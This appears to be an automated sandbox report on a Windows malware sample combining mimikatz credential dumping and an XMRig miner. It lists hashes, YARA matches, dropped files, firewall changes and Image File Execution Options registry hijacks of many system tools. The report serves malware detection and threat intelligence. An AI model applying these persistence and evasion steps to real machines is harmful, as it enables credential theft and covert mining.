mimikatz | 0155ae42f58154c14991983593da3f58600affed14c60734e7cf3ecfa7db5e71

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
10/01/2025, 00:24 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-01-10_98b095845e6aaccb3a817f5652fdb4c6_hacktools_icedid_mimikatz.exe
Size

9.1MB
MD5

98b095845e6aaccb3a817f5652fdb4c6
SHA1

4a142e145e65b8cd4b296b92bf1992e251095809
SHA256

0155ae42f58154c14991983593da3f58600affed14c60734e7cf3ecfa7db5e71
SHA512

380de710f72361f04e15e5384177c85b0af7b9291f71451fa01b2437386417ced1a69fe22a8861e130a10930dca9880e27fb0c9224516b47fe52308a2ab04567
SSDEEP

196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1

Score

10^/10

mimikatz xmrig credential_access discovery evasion execution miner persistence privilege_escalation upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3596 created 2132	3596	ktlbbtb.exe	38

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (30637) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
credential_access

LSASS Memory
T1003.001

XMRig Miner payload 12 IoCs

miner

resource	yara_rule
behavioral2/memory/1520-177-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp	xmrig
behavioral2/memory/1520-181-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp	xmrig
behavioral2/memory/1520-196-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp	xmrig
behavioral2/memory/1520-209-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp	xmrig
behavioral2/memory/1520-218-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp	xmrig
behavioral2/memory/1520-232-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp	xmrig
behavioral2/memory/1520-245-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp	xmrig
behavioral2/memory/1520-280-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp	xmrig
behavioral2/memory/1520-281-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp	xmrig
behavioral2/memory/1520-290-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp	xmrig
behavioral2/memory/1520-291-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp	xmrig
behavioral2/memory/1520-298-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 6 IoCs

resource	yara_rule
behavioral2/memory/3012-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/3012-4-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/files/0x0007000000023c88-6.dat	mimikatz
behavioral2/memory/1940-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/3676-136-0x00007FF79CCB0000-0x00007FF79CD9E000-memory.dmp	mimikatz
behavioral2/memory/3676-138-0x00007FF79CCB0000-0x00007FF79CD9E000-memory.dmp	mimikatz

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	ktlbbtb.exe
File created	C:\Windows\system32\drivers\npf.sys	wpcap.exe
File created	C:\Windows\system32\drivers\etc\hosts	ktlbbtb.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ktlbbtb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	ktlbbtb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	ktlbbtb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	ktlbbtb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	ktlbbtb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ktlbbtb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ktlbbtb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	ktlbbtb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	ktlbbtb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ktlbbtb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ktlbbtb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	ktlbbtb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ktlbbtb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	ktlbbtb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	ktlbbtb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ktlbbtb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	ktlbbtb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ktlbbtb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ktlbbtb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ktlbbtb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	ktlbbtb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	ktlbbtb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	ktlbbtb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	ktlbbtb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ktlbbtb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	ktlbbtb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	ktlbbtb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ktlbbtb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ktlbbtb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ktlbbtb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	ktlbbtb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ktlbbtb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ktlbbtb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ktlbbtb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ktlbbtb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	ktlbbtb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	ktlbbtb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	ktlbbtb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ktlbbtb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ktlbbtb.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3212	netsh.exe
4368	netsh.exe

Executes dropped EXE 28 IoCs

pid	Process
1940	ktlbbtb.exe
3596	ktlbbtb.exe
4752	wpcap.exe
2512	tzmttvjbt.exe
3676	vfshost.exe
4572	yubiiieib.exe
3676	xohudmc.exe
4836	tyxtue.exe
1520	btcbnp.exe
4552	yubiiieib.exe
2596	yubiiieib.exe
4520	yubiiieib.exe
4544	yubiiieib.exe
2420	yubiiieib.exe
4528	yubiiieib.exe
1324	yubiiieib.exe
3508	yubiiieib.exe
2876	yubiiieib.exe
1304	yubiiieib.exe
4424	yubiiieib.exe
4396	yubiiieib.exe
2956	yubiiieib.exe
3656	ktlbbtb.exe
2436	yubiiieib.exe
60	yubiiieib.exe
964	yubiiieib.exe
528	btpbguneu.exe
5468	ktlbbtb.exe

Loads dropped DLL 12 IoCs

pid	Process
4752	wpcap.exe
4752	wpcap.exe
4752	wpcap.exe
4752	wpcap.exe
4752	wpcap.exe
4752	wpcap.exe
4752	wpcap.exe
4752	wpcap.exe
4752	wpcap.exe
2512	tzmttvjbt.exe
2512	tzmttvjbt.exe
2512	tzmttvjbt.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
66	ifconfig.me
67	ifconfig.me

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Creates a Windows Service
persistence

Drops file in System32 directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	ktlbbtb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	ktlbbtb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EC98FD874C34E9667158FBB7DEFBD82F	ktlbbtb.exe
File created	C:\Windows\system32\Packet.dll	wpcap.exe
File created	C:\Windows\SysWOW64\tyxtue.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\tyxtue.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	ktlbbtb.exe
File created	C:\Windows\SysWOW64\pthreadVC.dll	wpcap.exe
File created	C:\Windows\SysWOW64\Packet.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	ktlbbtb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EC98FD874C34E9667158FBB7DEFBD82F	ktlbbtb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	ktlbbtb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	ktlbbtb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	ktlbbtb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	ktlbbtb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	ktlbbtb.exe
File created	C:\Windows\SysWOW64\wpcap.dll	wpcap.exe
File created	C:\Windows\system32\wpcap.dll	wpcap.exe

UPX packed file 36 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023cdc-134.dat	upx
behavioral2/memory/3676-136-0x00007FF79CCB0000-0x00007FF79CD9E000-memory.dmp	upx
behavioral2/memory/3676-138-0x00007FF79CCB0000-0x00007FF79CD9E000-memory.dmp	upx
behavioral2/files/0x0007000000023ce7-141.dat	upx
behavioral2/memory/4572-142-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp	upx
behavioral2/memory/4572-159-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp	upx
behavioral2/files/0x0007000000023ce4-163.dat	upx
behavioral2/memory/1520-164-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp	upx
behavioral2/memory/4552-170-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp	upx
behavioral2/memory/2596-174-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp	upx
behavioral2/memory/1520-177-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp	upx
behavioral2/memory/4520-179-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp	upx
behavioral2/memory/1520-181-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp	upx
behavioral2/memory/4544-184-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp	upx
behavioral2/memory/2420-188-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp	upx
behavioral2/memory/4528-192-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp	upx
behavioral2/memory/1324-195-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp	upx
behavioral2/memory/1520-196-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp	upx
behavioral2/memory/3508-199-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp	upx
behavioral2/memory/2876-203-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp	upx
behavioral2/memory/1304-207-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp	upx
behavioral2/memory/1520-209-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp	upx
behavioral2/memory/4424-212-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp	upx
behavioral2/memory/4396-216-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp	upx
behavioral2/memory/1520-218-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp	upx
behavioral2/memory/2956-221-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp	upx
behavioral2/memory/2436-229-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp	upx
behavioral2/memory/60-231-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp	upx
behavioral2/memory/1520-232-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp	upx
behavioral2/memory/964-234-0x00007FF78FC10000-0x00007FF78FC6B000-memory.dmp	upx
behavioral2/memory/1520-245-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp	upx
behavioral2/memory/1520-280-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp	upx
behavioral2/memory/1520-281-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp	upx
behavioral2/memory/1520-290-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp	upx
behavioral2/memory/1520-291-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp	upx
behavioral2/memory/1520-298-0x00007FF679AC0000-0x00007FF679BE0000-memory.dmp	upx

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\WinPcap\LICENSE	wpcap.exe
File created	C:\Program Files\WinPcap\uninstall.exe	wpcap.exe
File created	C:\Program Files\WinPcap\rpcapd.exe	wpcap.exe

Drops file in Windows directory 60 IoCs

description	ioc	Process
File created	C:\Windows\mpbivectb\iuzcjcmlt\btpbguneu.exe	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\specials\cnli-1.dll	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\specials\tibe-2.dll	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\specials\schoedcl.exe	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\specials\posh-0.dll	ktlbbtb.exe
File created	C:\Windows\izcmeubg\spoolsrv.xml	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\AppCapture32.dll	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\specials\coli-0.dll	ktlbbtb.exe
File created	C:\Windows\mpbivectb\Corporate\mimidrv.sys	ktlbbtb.exe
File created	C:\Windows\mpbivectb\Corporate\mimilib.dll	ktlbbtb.exe
File created	C:\Windows\mpbivectb\iuzcjcmlt\tzmttvjbt.exe	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\specials\ssleay32.dll	ktlbbtb.exe
File opened for modification	C:\Windows\izcmeubg\svschost.xml	ktlbbtb.exe
File opened for modification	C:\Windows\izcmeubg\docmicfg.xml	ktlbbtb.exe
File created	C:\Windows\mpbivectb\iuzcjcmlt\Packet.dll	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\specials\trch-1.dll	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\specials\trfo-2.dll	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\specials\zlib1.dll	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\specials\schoedcl.xml	ktlbbtb.exe
File created	C:\Windows\mpbivectb\iuzcjcmlt\wpcap.dll	ktlbbtb.exe
File created	C:\Windows\izcmeubg\schoedcl.xml	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\specials\exma-1.dll	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\specials\tucl-1.dll	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\specials\svschost.exe	ktlbbtb.exe
File created	C:\Windows\mpbivectb\upbdrjv\swrpwe.exe	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\vimpcsvc.xml	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\docmicfg.xml	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\schoedcl.xml	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\specials\svschost.xml	ktlbbtb.exe
File opened for modification	C:\Windows\izcmeubg\vimpcsvc.xml	ktlbbtb.exe
File opened for modification	C:\Windows\izcmeubg\spoolsrv.xml	ktlbbtb.exe
File opened for modification	C:\Windows\mpbivectb\iuzcjcmlt\Result.txt	btpbguneu.exe
File created	C:\Windows\mpbivectb\UnattendGC\specials\libxml2.dll	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\specials\docmicfg.xml	ktlbbtb.exe
File created	C:\Windows\izcmeubg\svschost.xml	ktlbbtb.exe
File created	C:\Windows\izcmeubg\vimpcsvc.xml	ktlbbtb.exe
File created	C:\Windows\izcmeubg\docmicfg.xml	ktlbbtb.exe
File created	C:\Windows\izcmeubg\ktlbbtb.exe	2025-01-10_98b095845e6aaccb3a817f5652fdb4c6_hacktools_icedid_mimikatz.exe
File created	C:\Windows\mpbivectb\UnattendGC\specials\spoolsrv.exe	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\AppCapture64.dll	ktlbbtb.exe
File opened for modification	C:\Windows\mpbivectb\Corporate\log.txt	cmd.exe
File created	C:\Windows\mpbivectb\iuzcjcmlt\scan.bat	ktlbbtb.exe
File created	C:\Windows\ime\ktlbbtb.exe	ktlbbtb.exe
File opened for modification	C:\Windows\izcmeubg\ktlbbtb.exe	2025-01-10_98b095845e6aaccb3a817f5652fdb4c6_hacktools_icedid_mimikatz.exe
File opened for modification	C:\Windows\mpbivectb\iuzcjcmlt\Packet.dll	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\specials\ucl.dll	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\specials\xdvl-0.dll	ktlbbtb.exe
File opened for modification	C:\Windows\izcmeubg\schoedcl.xml	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\svschost.xml	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\spoolsrv.xml	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\Shellcode.ini	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\specials\spoolsrv.xml	ktlbbtb.exe
File created	C:\Windows\mpbivectb\Corporate\vfshost.exe	ktlbbtb.exe
File created	C:\Windows\mpbivectb\iuzcjcmlt\ip.txt	ktlbbtb.exe
File created	C:\Windows\mpbivectb\iuzcjcmlt\wpcap.exe	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\specials\crli-0.dll	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\specials\libeay32.dll	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\specials\vimpcsvc.exe	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\specials\docmicfg.exe	ktlbbtb.exe
File created	C:\Windows\mpbivectb\UnattendGC\specials\vimpcsvc.xml	ktlbbtb.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3204	sc.exe
4404	sc.exe
2876	sc.exe
4324	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
